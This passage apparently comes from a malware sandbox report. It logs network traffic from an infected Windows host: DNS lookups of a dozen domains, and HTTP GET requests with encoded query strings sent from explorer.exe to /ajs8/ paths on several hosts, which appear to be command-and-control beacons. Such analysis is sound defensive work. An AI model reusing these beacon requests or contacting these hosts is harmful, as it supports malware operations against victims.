Aug 3, 2021 20:13:09.240035057 CEST	49745	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:13:09.240223885 CEST	49745	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:13:09.257615089 CEST	80	49745	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:11:00.119637012 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:00.144845963 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:01.155885935 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:01.191153049 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:02.806991100 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:02.831685066 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:04.280078888 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:04.305874109 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:05.857671976 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:05.890221119 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:07.277435064 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:07.302346945 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:09.425591946 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:09.451982021 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:10.466267109 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:10.499224901 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:11.445040941 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:11.470299006 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:12.427746058 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:12.452907085 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:14.053998947 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:14.081715107 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:15.510524035 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:15.538009882 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:17.467236042 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:17.494744062 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:19.426050901 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:19.454372883 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:20.406459093 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:20.440412998 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:21.625932932 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:21.659025908 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:23.145272970 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:23.172739983 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:24.771488905 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:24.807224989 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:29.927999020 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:29.963937998 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:36.519171953 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:36.553138018 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 20:11:48.243344069 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:11:48.284015894 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:05.225857973 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:05.273794889 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:10.325011969 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:10.362365007 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:17.091470003 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:17.364865065 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:27.393232107 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:27.431001902 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:32.533386946 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:32.578701973 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:37.597125053 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:37.633867025 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:40.097517967 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:40.130326986 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:41.913885117 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:41.962208986 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:42.651360035 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:42.698307991 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:47.864981890 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:47.994066954 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:53.660952091 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:53.698920965 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 20:12:58.853149891 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:12:58.889425039 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 20:13:03.992841005 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:13:04.048928976 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 20:13:09.068545103 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:13:09.106823921 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 20:13:14.253011942 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:13:14.293872118 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 20:13:19.565293074 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:13:19.873693943 CEST	53	59420	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 20:12:17.091470003 CEST	192.168.2.3	8.8.8.8	0xb2b9	Standard query (0)	www.jual-penggugurkandungan.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:27.393232107 CEST	192.168.2.3	8.8.8.8	0xd12a	Standard query (0)	www.discountpty.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:32.533386946 CEST	192.168.2.3	8.8.8.8	0xce7c	Standard query (0)	www.comericac.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:37.597125053 CEST	192.168.2.3	8.8.8.8	0xa3ad	Standard query (0)	www.n1getaccess.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:42.651360035 CEST	192.168.2.3	8.8.8.8	0xcedd	Standard query (0)	www.shopvybz.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:47.864981890 CEST	192.168.2.3	8.8.8.8	0x697d	Standard query (0)	www.handybusy.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:53.660952091 CEST	192.168.2.3	8.8.8.8	0x7370	Standard query (0)	www.theassistedadrscheme.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:58.853149891 CEST	192.168.2.3	8.8.8.8	0x9fee	Standard query (0)	www.indiadesignstory.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:03.992841005 CEST	192.168.2.3	8.8.8.8	0x9149	Standard query (0)	www.mybluemonitor.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:09.068545103 CEST	192.168.2.3	8.8.8.8	0x3a7	Standard query (0)	www.trucktodock.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:14.253011942 CEST	192.168.2.3	8.8.8.8	0x7416	Standard query (0)	www.travelawardsguide.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:19.565293074 CEST	192.168.2.3	8.8.8.8	0x603a	Standard query (0)	www.signin-solution.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 20:12:17.364865065 CEST	8.8.8.8	192.168.2.3	0xb2b9	Name error (3)	www.jual-penggugurkandungan.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:27.431001902 CEST	8.8.8.8	192.168.2.3	0xd12a	No error (0)	www.discountpty.com	bazar-panama.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:27.431001902 CEST	8.8.8.8	192.168.2.3	0xd12a	No error (0)	bazar-panama.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:27.431001902 CEST	8.8.8.8	192.168.2.3	0xd12a	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:32.578701973 CEST	8.8.8.8	192.168.2.3	0xce7c	Name error (3)	www.comericac.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:37.633867025 CEST	8.8.8.8	192.168.2.3	0xa3ad	Name error (3)	www.n1getaccess.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:42.698307991 CEST	8.8.8.8	192.168.2.3	0xcedd	No error (0)	www.shopvybz.com	shop-vybz.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:42.698307991 CEST	8.8.8.8	192.168.2.3	0xcedd	No error (0)	shop-vybz.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:42.698307991 CEST	8.8.8.8	192.168.2.3	0xcedd	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:47.994066954 CEST	8.8.8.8	192.168.2.3	0x697d	No error (0)	www.handybusy.com	handybusy.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:47.994066954 CEST	8.8.8.8	192.168.2.3	0x697d	No error (0)	handybusy.com		162.241.218.97	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:53.698920965 CEST	8.8.8.8	192.168.2.3	0x7370	No error (0)	www.theassistedadrscheme.com	theassistedadrscheme.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:53.698920965 CEST	8.8.8.8	192.168.2.3	0x7370	No error (0)	theassistedadrscheme.com		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 20:12:58.889425039 CEST	8.8.8.8	192.168.2.3	0x9fee	No error (0)	www.indiadesignstory.com	indiadesignstory.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:12:58.889425039 CEST	8.8.8.8	192.168.2.3	0x9fee	No error (0)	indiadesignstory.com		160.153.138.219	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:04.048928976 CEST	8.8.8.8	192.168.2.3	0x9149	Name error (3)	www.mybluemonitor.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:09.106823921 CEST	8.8.8.8	192.168.2.3	0x3a7	No error (0)	www.trucktodock.com	trucktodock.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:13:09.106823921 CEST	8.8.8.8	192.168.2.3	0x3a7	No error (0)	trucktodock.com		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:14.293872118 CEST	8.8.8.8	192.168.2.3	0x7416	No error (0)	www.travelawardsguide.com		217.160.0.64	A (IP address)	IN (0x0001)
Aug 3, 2021 20:13:19.873693943 CEST	8.8.8.8	192.168.2.3	0x603a	No error (0)	www.signin-solution.com	dom.iserver.space		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:13:19.873693943 CEST	8.8.8.8	192.168.2.3	0x603a	No error (0)	dom.iserver.space	server.domainsconfig.ru		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:13:19.873693943 CEST	8.8.8.8	192.168.2.3	0x603a	No error (0)	server.domainsconfig.ru		193.142.59.163	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.discountpty.com

www.shopvybz.com

www.handybusy.com

www.theassistedadrscheme.com

www.indiadesignstory.com

www.trucktodock.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49738	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:12:27.453727007 CEST	5523	OUT	GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1 Host: www.discountpty.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:12:27.500344038 CEST	5524	IN	HTTP/1.1 403 Forbidden Date: Tue, 03 Aug 2021 18:12:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Dc: gcp-europe-west1 X-Request-ID: 958672ac-771b-4294-8152-fabfc6d2d341 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 679183a7af874eb5-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis
Aug 3, 2021 20:12:27.500381947 CEST	5526	IN	Data Raw: 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b Data Ascii: play:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action
Aug 3, 2021 20:12:27.500394106 CEST	5527	IN	Data Raw: 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a Data Ascii: negado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": {
Aug 3, 2021 20:12:27.500406027 CEST	5528	IN	Data Raw: 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 Data Ascii: -title": " " }, "ja": { "title": "", "content-title
Aug 3, 2021 20:12:27.500422955 CEST	5529	IN	Data Raw: 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 Data Ascii: r (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"];

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49741	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:12:42.716824055 CEST	5549	OUT	GET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1 Host: www.shopvybz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:12:42.819216013 CEST	5550	IN	HTTP/1.1 403 Forbidden Date: Tue, 03 Aug 2021 18:12:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 193 X-Sorting-Hat-ShopId: 46504476822 X-Request-ID: 5a30c7d5-1d11-4512-a8a2-713f34fc3e7e X-Download-Options: noopen X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Dc: gcp-europe-west1 CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 679184070f52dff7-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
Aug 3, 2021 20:12:42.819238901 CEST	5552	IN	Data Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
Aug 3, 2021 20:12:42.819264889 CEST	5553	IN	Data Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
Aug 3, 2021 20:12:42.819279909 CEST	5554	IN	Data Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 Data Ascii: ", "content-title": " " }, "ja": { "title": "
Aug 3, 2021 20:12:42.819307089 CEST	5555	IN	Data Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
Aug 3, 2021 20:12:42.819319010 CEST	5555	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49742	162.241.218.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:12:48.131254911 CEST	5556	OUT	GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1 Host: www.handybusy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
